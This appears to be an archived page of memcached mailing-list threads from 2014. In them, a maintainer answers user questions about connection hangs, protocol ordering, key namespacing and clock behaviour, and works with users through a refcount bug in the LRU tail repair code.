#2  0x080599f5 in assoc_maintenance_thread (arg=0x0) at assoc.c:251
#3  0x00a61a49 in start_thread () from /lib/libpthread.so.0
#4  0x005c4aee in clone () from /lib/libc.so.6
(gdb) t 5
[Switching to thread 5 (Thread 0xf7771b70 (LWP 24962))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x00a68998 in sendmsg () from /lib/libpthread.so.0
#2  0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at 
 memcached.c:4044
#3  drive_machine (fd=431, which=2, arg=0xfef8ce48) at 
 memcached.c:4370
#4  event_handler (fd=431, which=2, arg=0xfef8ce48) at 
 memcached.c:4441
#5  0x0073d9e4 in event_process_active (base=0x9310658, flags=0) at 
 event.c:395
#6  event_base_loop (base=0x9310658, flags=0) at event.c:547
#7  0x08059fee in worker_libevent (arg=0x930c698) at thread.c:471
#8  0x00a61a49 in start_thread () from /lib/libpthread.so.0
#9

Re: memcached-1.4.20 stuck when Too many open connections

2014-10-29 Thread dormando
You're absolutely sure the running version was 1.4.20? that looks like a
bug that was fixed in .19 or .20

hmmm... maybe a unix domain bug?

On Tue, 28 Oct 2014, Samdy Sun wrote:

 Hello,  I got a memcached-1.4.20 stuck problem when EMFILE happen.
   Here are my memcached's cmdline memcached -s /xxx/mc_usock.11201 -c 1024 
 -m 4000 -f 1.05 -o slab_automove -o slab_reassign  -t 1 -p 11201.
  
   cat /proc/version 
   Linux version 2.6.32-358.el6.x86_64 
 (mockbu...@x86-022.build.eng.bos.redhat.com) (gcc version 4.4.7 20120313 (Red 
 Hat 4.4.7-3) (GCC) ) #1 SMP Tue
 Jan 29 11:47:41 EST 2013

   memcached-1.4.20 stuck and don't work any more when it runs for a period of 
 time.

   Here are some information for gdb:  (gdb) p stats
   $2 = {mutex = {__data = {__lock = 0, __count = 0, __owner = 0, __kind = 0, 
 __nusers = 0, {__spins = 0, 
         __list = {__next = 0x0}}}, __size = '\000' repeats 23 times, 
 __align = 0}, curr_items = 149156, 
   total_items = 9876811, curr_bytes = 3712501870, curr_conns = 5, total_conns 
 = 39738, rejected_conns = 0, 
   malloc_fails = 0, reserved_fds = 5, conn_structs = 1012, get_cmds = 0, 
 set_cmds = 0, touch_cmds = 0, 
   get_hits = 0, get_misses = 0, touch_hits = 0, touch_misses = 0, evictions = 
 0, reclaimed = 0, 
   started = 0, accepting_conns = false, listen_disabled_num = 1, 
 hash_power_level = 17, 
   hash_bytes = 524288, hash_is_expanding = false, expired_unfetched = 0, 
 evicted_unfetched = 0, 
   slab_reassign_running = false, slabs_moved = 20, lru_crawler_running = 
 false, 
   disable_write_by_exptime = 0, disable_write_by_length = 0, 
 disable_write_by_access = 0, 
   evicted_write_reply_timeout_times = 0}

   (gdb) p allow_new_conns
   $4 = false

   And I found that allow_new_conns just set to false when accept failed 
 and errno is EMFILE. 
   Here are the codes:  
 static void drive_machine(conn *c) {
                  ……
                  } else if (errno == EMFILE) {
                    if (settings.verbose  0)
                          fprintf(stderr, Too many open connections\n);
                    accept_new_conns(false);
                    stop = true;
                  } else {
                  ……
 }
   
   If I change the flag allow_new_conns, it can work again. As below:
   (gdb) set allow_new_conns=1
   (gdb) p allow_new_conns
   $5 = true
   (gdb) c
   Continuing.

   I know that allow_new_conns will be set to true when conn_close 
 called. But how could it happen for the case that when accept failed ,
 and errno is EMFILE, and this connection is the only one for accepting. 
 Notes that curr_conns = 5.
   Not run out of fd:
   ls /proc/1748(memcached_pid)/fd | wc -l
   17
   

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Is memcached server response guaranteed to be in order?

2014-10-23 Thread dormando
with the ascii protocol, yes. It would not work otherwise.

with the binary protocol, the answer is also currently yes, but the
ordering isn't strict and could be up to the individual commands.

On Wed, 22 Oct 2014, Yaowen Tu wrote:


 If I have a client that creates a TCP connection, and send multiple commands 
 to the memcached server, will server guaranteed to respond to these
 commands in the same order?


 Thanks,

 Yaowen


 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Is memcached server response guaranteed to be in order?

2014-10-23 Thread dormando
I don't believe any binprot commands are out of order presently. However
the protocol *allows* them to be out of order. it's probably a bug you're
seeing in the client. also make sure your memcached daemon is up to date.

On Thu, 23 Oct 2014, Yaowen Tu wrote:

 Thanks for your response.
 Could you please give me more information about individual commands? In which 
 case it would be out of order?

 I am using xmemcached client and seeing some weird behavior with binary 
 command, but text command works. 

 I know there are some bugs in xmemcached client binary command code, I am 
 trying to dig deeper to see if it is because of ordering of memcached
 responses. 

 Based on your answer it is highly possible, so I would be really appreciated 
 if you could share with me more detailed information.

 Thanks,
 Yaowen

 Yaowen

 On Thu, Oct 23, 2014 at 5:19 PM, dormando dorma...@rydia.net wrote:
   with the ascii protocol, yes. It would not work otherwise.

   with the binary protocol, the answer is also currently yes, but the
   ordering isn't strict and could be up to the individual commands.

   On Wed, 22 Oct 2014, Yaowen Tu wrote:

   
If I have a client that creates a TCP connection, and send multiple 
 commands to the memcached server, will server guaranteed to
   respond to these
commands in the same order?
   
   
Thanks,
   
Yaowen
   
   
--
   
---
You received this message because you are subscribed to the Google 
 Groups memcached group.
To unsubscribe from this group and stop receiving emails from it, 
 send an email to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.
   
   

   --

   ---
   You received this message because you are subscribed to the Google 
 Groups memcached group.
   To unsubscribe from this group and stop receiving emails from it, send 
 an email to memcached+unsubscr...@googlegroups.com.
   For more options, visit https://groups.google.com/d/optout.


 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Max number of concurrent updates for a same key at same time in memcache.

2014-10-21 Thread dormando
Internally, there's a per-item lock, so an item can only be updated by one
thread at a time.

This is *just* during the internal update, not while a client is uploading
or downloading data to the key. You can probably do several thousand
updates per second to the same key without problem (like incr'ing in a
loop). Possibly a lot more (100k+)

What're you trying to do which requires updating one key so much?

On Tue, 21 Oct 2014, Shashank Sharma wrote:

 Hi all,

 Reading memcache documents its clear that it can handle a very heavy load of 
 traffic. However I was more interested in knowing the bound on how may
 updates for a specific key at the same time can memcache handle.

 -Shashank

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Collision Resolution mechanism

2014-10-19 Thread dormando
The hash table buckets are chained.

By default memcached autoresizes the hash table as the number of items
grows, so bucket collision is relatively rare. In recent versions you can
also switch the internal hash algorithm between jenkins and murmur if you
want to test.

On Sun, 19 Oct 2014, Deepak S wrote:

 Hi all, this is my first mail to this awesome group.What is the collision 
 resolution mechanism used in memcached hash table?
 Thanks

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


memcached 1.4.21

2014-10-13 Thread dormando
Is out: https://code.google.com/p/memcached/wiki/ReleaseNotes1421 -
targeted release just for the OOM issues reported by Box + some misc
fixes.

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: items not able to be memcached and not logging

2014-10-05 Thread dormando
No idea, sorry :/

On Thu, 2 Oct 2014, Sheel Shah wrote:

 Understood.
 Do you know where I can find a supported windows version of the memcached 
 exe? The most recent one I was able to find was version 1.4.4.

 Thanks,
 Sheel

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: items not able to be memcached and not logging

2014-10-01 Thread dormando
Hey,

Sorry but that version is well over 5 years old, and a forked windows port
at that. It's unsupported.

On Wed, 1 Oct 2014, Sheel Shah wrote:


 I believe the version number on our current memcached EXE is 1.2.6.

 The error I see in my independent log is the following:

 Item could not be cached with memcached: item name Type: 
 System.Data.DataTable, In process Cache Duration: 02:00:00

 I intentionally left the item name out of the reply, but the items are not 
 all the same, and are of different types.

 Thanks,
 Sheel

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: items not able to be memcached and not logging

2014-09-30 Thread dormando
What version of memcached are you running (the server, not the client).

What is the exact error you're seeing in the logs?

On Tue, 30 Sep 2014, Sheel Shah wrote:

 Hello,
 I apologize for the vagueness of this post, as I am new to using and 
 supporting memcached. For the last couple of months, we have seen a large
 number of errors where items could not be cached through Memcached. To 
 troubleshoot the issue, we are attempting to enable logging that we found on
 this URL 

 https://github.com/enyim/EnyimMemcached/wiki/Configure-Logging

 We attempted to enable the diagnostic logging as well as the Log4Net logging. 
 And while we are seeing errors in another log file which shows that
 the items could not be memcached, we are unable to see anything in the 
 diagnostic logs that could explain why the items are failing. I'm fairly
 certain it's not a permissions problem, as I allowed the app pool identity 
 full access to the subfolder as well as the log file, and the read-only
 attribute on the file/folder is not checked.

 Has anyone else had a similar issue or can point me in the right direction?

 Thanks,
 Sheel Shah

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: change os'date Memcached stats time While being changed

2014-09-16 Thread dormando
Recent versions use a monotonic clock, so changing the system clock can't
cause memcached to lose its mind.

Why are you trying to do this on purpose?

On Tue, 16 Sep 2014, Yu Liu wrote:

 Today I found memcached cat not be work。 so , I found memcached stats time 
 while being changed before os date change。
 EXP-1 :
 Centos 6.5 64bit 
 Memcache Version: 1.4.7 

 # date
 Tue Sep 16 09:56:43 CST 2014

 # telnet 10.11.1.15 11211
 Trying 10.11.1.15...
 Connected to 10.11.1.15 (10.11.1.15).
 Escape character is '^]'. stats
 STAT pid 2923
 STAT uptime 9
 STAT time 1410850931
 STAT version 1.4.7

 change date 
 # date
 Fri Jul 26 00:00:00 CST 2013

 # telnet 10.11.1.15 11211
 Trying 10.11.1.15...
 Connected to 10.11.1.15 (10.11.1.15).
 Escape character is '^]'. stats
 stats
 STAT pid 2923
 STAT uptime 4258884380
 STAT time 5669735302
 STAT version 1.4.7

 however upgrade memcache to 1.4.20 
 Centos 6.5 64bit 
 Memcache Version: 1.4.20

 #stats
 STAT pid 2586
 STAT uptime 8
 STAT time 1410838280
 STAT version 1.4.20
 STAT libevent 1.4.13-stable

 change date 
 stats
 STAT pid 2586
 STAT uptime 55
 STAT time 1410838327
 STAT version 1.4.20

 Now, this time can not be changed. what's the matter ? 

 I did not find the answer in 
 http://code.google.com/p/memcached/wiki/ReleaseNotes 。 

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Remove certain items from the cache

2014-09-03 Thread dormando
Why would another client get the wrong data if the original data was
successfully uploaded?

I don't understand the use case, and it's not possible either way.

On Wed, 3 Sep 2014, Xingui Shi wrote:

 what i meant is the data is successfully uploaded, but the client restart for 
 some reason. the data stored in memcache server need to be flushed.
 or other client my get the wrong data.

 在 2014年9月3日星期三UTC+8下午3时04分59秒,Dormando写道:
   If a client is uploading something and it does not complete the upload,
   the data will be dropped.

   Otherwise, no.

   On Wed, 3 Sep 2014, Xingui Shi wrote:

Hi,  Is there any way to drop data add by a client when the client 
 aborted or exit normally?
   
thanks.
   
在 2014年8月12日星期二UTC+8上午10时25分43秒,Dormando写道:
   
       Hello there,
       There he has a method to be able to remove items from the 
 cache using a regular expression on the key. For example we want to
   remove
      all the key as my_key_ *?
       We try to parse all the slabs with the command stats 
 cachedump but our slabs contain several pages and it is impossible to
   recover
      all the elements!
       Thank you.
      
   
      Hi,
   
      The common way to do this, instantly, and atomically across 
 your entire
      memcached cluster is via namespacing:
      
 http://code.google.com/p/memcached/wiki/NewProgrammingTricks#Namespacing
   
      You take a tradeoff: before I look up my key, I fetch a side 
 key which
      contains the current prefix. Then I add that prefix to my 
 normal key and
      do the lookup. When you want to invalidate all keys with the 
 same prefix,
      you incr or otherwise update the prefix. The old keys will fall 
 out of the
      LRU and your clients will no longer access them.
   
      This is *much* more efficient than any wrangling around with 
 scanning and
      parsing keys. That only gets worse as you get a larger cluster, 
 while
      namespacing stays at a consistent speed.
   
      Does this match what you're looking for, or did you have some 
 specific
      requirements? If so, please give more detail for your problem.
   
--
   
---
You received this message because you are subscribed to the Google 
 Groups memcached group.
To unsubscribe from this group and stop receiving emails from it, 
 send an email to memcached+...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.
   
   

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: tail repair issue (1.4.20)

2014-08-28 Thread dormando
Thanks so much for sticking around and testing!

I have a number of bugs to go over as I mentioned before, so it may take a
little longer to bake this into a release. I still want to add a cap on
how much churn it allows, so for 10,000 items you might instead get a
handful of OOM's. This is to deal with extreme cases regardless.

Again, thanks. It's been really hard to get people to stick around for
this; first we had to fix the crash caused by items sitting in the LRU,
then it became apparent why they were there and we could fix that issue.
I'm happy to understand this.

On Tue, 26 Aug 2014, Jay Grizzard wrote:

 Okay, so, we did some testing!
 I deployed a test build last Thursday and let it run with no further changes, 
 graphing the ‘reflocked’ counter (which is the metric I added for
 ‘refcounted so moved to other end of LRU’). The graph for that ends up 
 looking like this: http://i.imgur.com/0CZfHWf.png

 Basically a spike on restart (which makes sense, there’s probably a few 
 fast-expiring or deleted entries on the tail almost immediately), and then
 occasional spikes over time. More spikes than I actually *expected*, but none 
 are particularly large, and I’d completely believe that we had
 ‘legitimate’ locking of items in there, too. So I consider that completely 
 helpful.

 (The graph is total across all slabs, and peaks at 8/sec, and only briefly, 
 so… yeah, healthy.)

 The other thing I did yesterday was to intentionally lock a bunch of items to 
 see what the behavior looked like. I picked a slab that was
 relatively high churn (max item age ~6000) and had no reflocks at all. 
 Created 10k items and locked them. The reflocked graph for that looks like
 this: http://i.imgur.com/oghSU3o.png

 Basically, one big spike every couple of hours (with the interval decreasing 
 as traffic increases). You can’t see it from the graph, but the
 reflocked counter increments by exactly 10,000 for each spike, while the 
 outofmemory counter stays at zero. This is exactly what I expected to
 happen, which is awesome.

 We’ve otherwise been really stable with the patch, so I think I’m fairly 
 comfortable saying the patch you provided is a reasonable solution to the
 problem. I’d even be satisfied without adding anything else to limit number 
 of moves to 5 in a go, since the odds of that being an issue in just
 about any situation seem … low. But if you can add it cleanly, go for it! :)

 Let me know when you have a final patch (which would presumably be a release 
 candidate for 1.4.21) and I’ll be happy to verify that as well, and
 then we can officially declare this bug dead and have a little party, since I 
 totally think finally finding this thing is deserving of a party… ;)

 -j


 On Thu, Aug 21, 2014 at 12:33 PM, dormando dorma...@rydia.net wrote:
   Okay cool.

   As I mentioned with the original link I will be adding some sort of 
 sanity
   checking to break the loop. I just have to reorganize the whole thing 
 and
   ran out of time (I got stuck for a while because unlink was wiping
   search-prev and it kept bailing the loop :P)

   I need someone to try it to see if it's the right approach first, then 
 the
   rest is doable. It's just tricky code and requires some care.

   Thanks for putting some effort into this. I really appreciate it!

   On Thu, 21 Aug 2014, Jay Grizzard wrote:

Hi, sorry about the slow response. Naturally, the daily problem we 
 were having stopped as soon as you checked in that patch.
Typical, eh?
Anyhow, I’ve studied the patch and it seems to be pretty good — the 
 only worry I have is that if you end up with the extremely
degenerate case of an entire LRU being refcounted, you have to walk 
 the entire LRU before returning ‘out of memory’. I’m not
thinking that this is a big problem (because if you have a few tens 
 of thousands of items, that’s pretty quick… and if you have
millions… well, why do you have millions of items refcounted?), but 
 worth at least noting. 
   
I was going to suggest a change to make it fit into the ‘tries’ loop 
 better so those moves got counted as a try, but there
doesn’t seem to be a particularly clean way to do that, so I’m 
 willing to just accept it as a limitation that might get hit in
situations far worse than the one that’s causing us issues right now. 
 I’m okay with that. 
   
I haven’t tried the patch under production load yet, because I wanted 
 to have stats to give us some information about what was
going on under the hood. I finally got a chance to add in an 
 additional stat for refcounted items on the tail — I sent you a PR
with that patch (https://github.com/dormando/memcached/pull/1). I 
 *think* I got the right things in the right places, though you
may take issue with the stat name (“reflocked”).
   
Now that I have the stats, I’m going to work on putting

Re: tail repair issue (1.4.20)

2014-08-21 Thread dormando
Okay cool.

As I mentioned with the original link I will be adding some sort of sanity
checking to break the loop. I just have to reorganize the whole thing and
ran out of time (I got stuck for a while because unlink was wiping
search-prev and it kept bailing the loop :P)

I need someone to try it to see if it's the right approach first, then the
rest is doable. It's just tricky code and requires some care.

Thanks for putting some effort into this. I really appreciate it!

On Thu, 21 Aug 2014, Jay Grizzard wrote:

 Hi, sorry about the slow response. Naturally, the daily problem we were 
 having stopped as soon as you checked in that patch.
 Typical, eh?
 Anyhow, I’ve studied the patch and it seems to be pretty good — the only 
 worry I have is that if you end up with the extremely
 degenerate case of an entire LRU being refcounted, you have to walk the 
 entire LRU before returning ‘out of memory’. I’m not
 thinking that this is a big problem (because if you have a few tens of 
 thousands of items, that’s pretty quick… and if you have
 millions… well, why do you have millions of items refcounted?), but worth at 
 least noting. 

 I was going to suggest a change to make it fit into the ‘tries’ loop better 
 so those moves got counted as a try, but there
 doesn’t seem to be a particularly clean way to do that, so I’m willing to 
 just accept it as a limitation that might get hit in
 situations far worse than the one that’s causing us issues right now. I’m 
 okay with that. 

 I haven’t tried the patch under production load yet, because I wanted to have 
 stats to give us some information about what was
 going on under the hood. I finally got a chance to add in an additional stat 
 for refcounted items on the tail — I sent you a PR
 with that patch (https://github.com/dormando/memcached/pull/1). I *think* I 
 got the right things in the right places, though you
 may take issue with the stat name (“reflocked”).

 Now that I have the stats, I’m going to work on putting a patched copy out 
 under production load to make sure it holds up there,
 and at least see about artificially generating one of the hung-get situations 
 that was causing us problems. I’ll let you know
 how that works out!

 -j


 On Mon, Aug 11, 2014 at 8:54 PM, dormando dorma...@rydia.net wrote:

 Well, sounds like whatever process was asking for that data is dead 
 (and possibly pissing off a customer) so
   you should
indeed figure out what
 that's about.
   
Yeah, we’ll definitely hunt this one down. I’ll have to toss up a 
 monitor to look for things in a write state for
   extended
periods and then go do some tracing (rather than, say, waiting for it 
 to actually break again). We *do* have some
   legitimately
long-running (multi-hour) things going on, so can’t just say “long 
 connection bad!”, but it would be nice if maybe
   those
processes could slurp their entire response upfront or some such.
   
   
 I think another thing we can do is actually throw a 
 refcounted-for-a-long-time 
 item back to the front of the LRU. I'll try a patch for that this 
 weekend. It should
 have no real overhead compared to other approaches of timing out 
 connections.
   
Is there any reason you can’t do “if refcount  1 when walking the 
 end of the tail, send to the front” without
   requiring
‘refcounted for a long time’ (with, of course, still limiting it to 
 5ish actions)? It seems like this would be
   pretty safe,
since generally stuff at the end of LRU shouldn’t have a refcount, 
 and then you don’t need extra code for figuring
   out how long
something has been refcounted.
   
I guess there’s a slightly degenerate case in there, which is that if 
 you have a small slab that’s 100%
   refcounted, you end up
cycling a bunch of pointers every write just to run the LRU in a big 
 circle and never write anything (similar to
   the case you
suggest in your last paragraph), but that’s a situation I’m totally 
 willing to accept. ;)
   
Anyhow, looking forward to a patch, and will gladly help test!
   

 Here, try out this branch:
 https://github.com/dormando/memcached/tree/refchuck

 It needs some cleanup and sanity checking. I want to redo the loop instead
 of the weird goto, add an arg to item_update intead of copypasta, and add
 one or two sanity checks to break the loop if you're trying to alloc out
 of a class that's 100% reflocked.

 I added a test that works okay. Fails before, runs after. Can you try
 this on one or two machines and see what the impact is?

 If it works okay I'll clean it up and merge. Need to spend a little more
 time on the PR queue before I can cut though.

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails

Re: tail repair issue (1.4.20)

2014-08-11 Thread dormando
Apparently I lied about the weekend, sorry...

On Mon, 11 Aug 2014, Jay Grizzard wrote:

  Well, sounds like whatever process was asking for that data is dead (and 
 possibly pissing off a customer) so you should
 indeed figure out what
  that's about.

 Yeah, we’ll definitely hunt this one down. I’ll have to toss up a monitor to 
 look for things in a write state for extended
 periods and then go do some tracing (rather than, say, waiting for it to 
 actually break again). We *do* have some legitimately
 long-running (multi-hour) things going on, so can’t just say “long connection 
 bad!”, but it would be nice if maybe those
 processes could slurp their entire response upfront or some such.

Good luck!


  I think another thing we can do is actually throw a 
  refcounted-for-a-long-time 
  item back to the front of the LRU. I'll try a patch for that this weekend. 
  It should
  have no real overhead compared to other approaches of timing out 
  connections.

 Is there any reason you can’t do “if refcount  1 when walking the end of the 
 tail, send to the front” without requiring
 ‘refcounted for a long time’ (with, of course, still limiting it to 5ish 
 actions)? It seems like this would be pretty safe,
 since generally stuff at the end of LRU shouldn’t have a refcount, and then 
 you don’t need extra code for figuring out how long
 something has been refcounted.

 I guess there’s a slightly degenerate case in there, which is that if you 
 have a small slab that’s 100% refcounted, you end up
 cycling a bunch of pointers every write just to run the LRU in a big circle 
 and never write anything (similar to the case you
 suggest in your last paragraph), but that’s a situation I’m totally willing 
 to accept. ;)

 Anyhow, looking forward to a patch, and will gladly help test!


Thanks!

I'm going back and forth on it honestly. I think it should only move it if
it's been at least UPDATE_INTERVAL since it last moved it, possibly
UPDATE_INTERVAL * 4.

Given your case of I have a bajillion objects ref'ed by this one
connection, and the fact that the allocator only walks five up in the
history before giving up, I have two main options:

1) throw the bottom 5 to the top, then give up (and do that for each
allocation forever, which can slow down all writes by holding the central
cache lock for longer). That'll still cause a number of OOM's while it
tries to clear your 9,00 ref'ed objects from the bottom (yeah I know
it's only 3200ish)

2) If refcounted + last_update  now + UPDATE_INTERVAL*N - flip to top
and don't count that as a try. This will cause memcached to have a very
brief hiccup when it lands on the pile of objects, but won't cause an OOM
and won't flip around forever.

It also avoids a pathological regression if someone hammers a slab class
stuck in this state (and path #1 was chosen).

If you have teeny slab classes you're likely to be screwed either way, so
the extra time interval doesn't hurt you much more than you would anyway.
I assume/hope objects that you've been fetching take more than a couple
minutes to hit the bottom of the slab class. If they do, your evictions
are probably nutters and hit rate crap anyway; you'd need more ram.

So yeah. leaning toward #2? Different definition of refcounted for a long
time compare to what tail_repairs defaulted to. Much shorter.

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Remove certain items from the cache

2014-08-11 Thread dormando

 Hello there,
 There he has a method to be able to remove items from the cache using a 
 regular expression on the key. For example we want to remove all the key as 
 my_key_ *?
 We try to parse all the slabs with the command stats cachedump but our 
 slabs contain several pages and it is impossible to recover all the elements!
 Thank you.


Hi,

The common way to do this, instantly, and atomically across your entire
memcached cluster is via namespacing:
http://code.google.com/p/memcached/wiki/NewProgrammingTricks#Namespacing

You take a tradeoff: before I look up my key, I fetch a side key which
contains the current prefix. Then I add that prefix to my normal key and
do the lookup. When you want to invalidate all keys with the same prefix,
you incr or otherwise update the prefix. The old keys will fall out of the
LRU and your clients will no longer access them.

This is *much* more efficient than any wrangling around with scanning and
parsing keys. That only gets worse as you get a larger cluster, while
namespacing stays at a consistent speed.

Does this match what you're looking for, or did you have some specific
requirements? If so, please give more detail for your problem.

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: tail repair issue (1.4.20)

2014-08-11 Thread dormando

  Well, sounds like whatever process was asking for that data is dead (and 
 possibly pissing off a customer) so you should
 indeed figure out what
  that's about.

 Yeah, we’ll definitely hunt this one down. I’ll have to toss up a monitor to 
 look for things in a write state for extended
 periods and then go do some tracing (rather than, say, waiting for it to 
 actually break again). We *do* have some legitimately
 long-running (multi-hour) things going on, so can’t just say “long connection 
 bad!”, but it would be nice if maybe those
 processes could slurp their entire response upfront or some such.


  I think another thing we can do is actually throw a 
  refcounted-for-a-long-time 
  item back to the front of the LRU. I'll try a patch for that this weekend. 
  It should
  have no real overhead compared to other approaches of timing out 
  connections.

 Is there any reason you can’t do “if refcount  1 when walking the end of the 
 tail, send to the front” without requiring
 ‘refcounted for a long time’ (with, of course, still limiting it to 5ish 
 actions)? It seems like this would be pretty safe,
 since generally stuff at the end of LRU shouldn’t have a refcount, and then 
 you don’t need extra code for figuring out how long
 something has been refcounted.

 I guess there’s a slightly degenerate case in there, which is that if you 
 have a small slab that’s 100% refcounted, you end up
 cycling a bunch of pointers every write just to run the LRU in a big circle 
 and never write anything (similar to the case you
 suggest in your last paragraph), but that’s a situation I’m totally willing 
 to accept. ;)

 Anyhow, looking forward to a patch, and will gladly help test!


Here, try out this branch:
https://github.com/dormando/memcached/tree/refchuck

It needs some cleanup and sanity checking. I want to redo the loop instead
of the weird goto, add an arg to item_update intead of copypasta, and add
one or two sanity checks to break the loop if you're trying to alloc out
of a class that's 100% reflocked.

I added a test that works okay. Fails before, runs after. Can you try
this on one or two machines and see what the impact is?

If it works okay I'll clean it up and merge. Need to spend a little more
time on the PR queue before I can cut though.

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: tail repair issue (1.4.20)

2014-08-07 Thread dormando
Thanks! It might take me a while to look into it more closely.

That conn_mwrite is probably bad, however a single connection shouldn't be
able to do it. Before the OOM is given up, memcached walks up the chain
from the bottom of the LRU by 5ish. So all of them have to be locked, or
possibly some thing I'm unaware of.

Great that you have some cores. Can you look at the tail of the LRU for
the slab which was OOM'ing, and print the item struct there? If possible,
walk up 5-10 items back from the tail and print each (anonymized, of
course). It'd be useful to see the refcount and flags on the items.

Have you tried re-enabling tailrepairs on one of your .20 instances? It
could still crash sometimes, but you can set the timeout to a reasonably
low number and see if that helps at all while we figure this out.

On Thu, 7 Aug 2014, Jay Grizzard wrote:

 (I work with Denis, who is out of town this week)
 So we finally got a more proper 1.4.20 deployment going, and we’ve seen this 
 issue quite a lot over the past week. When it
 happened this morning I was able to grab what you requested.

 I’ve included a couple of “stats conn” dumps, with anonymized addresses, 
 taken four minutes apart. It looks like there’s one
 connection that could possibly be hung:

   STAT 2089:state conn_mwrite

 …would that be enough to cause this problem? (I’m assuming the answer is “it 
 depends”) I snagged a core file from the process
 that I should be able to muck through to answer questions if there’s 
 somewhere in there we would find useful information.

 Worth noting that while we’ve been able to reproduce the hang (a single slab 
 starts reporting oom for every write), we haven’t
 reproduced the “but recovers on its own” part because these are production 
 servers and the problem actually causes real issues,
 so we restart them rather than waiting several hours to see if the problem 
 clears up. 

 Also, reading up in the thread, it’s worth noting that lack of TCP keepalives 
 (which we actually have, memcached enables it)
 wouldn’t actually affect the “and automatically recover” aspect of things, 
 because TCP keepalives only happen when a connection
 is completely idle. When there’s pending data (which there would be on a hung 
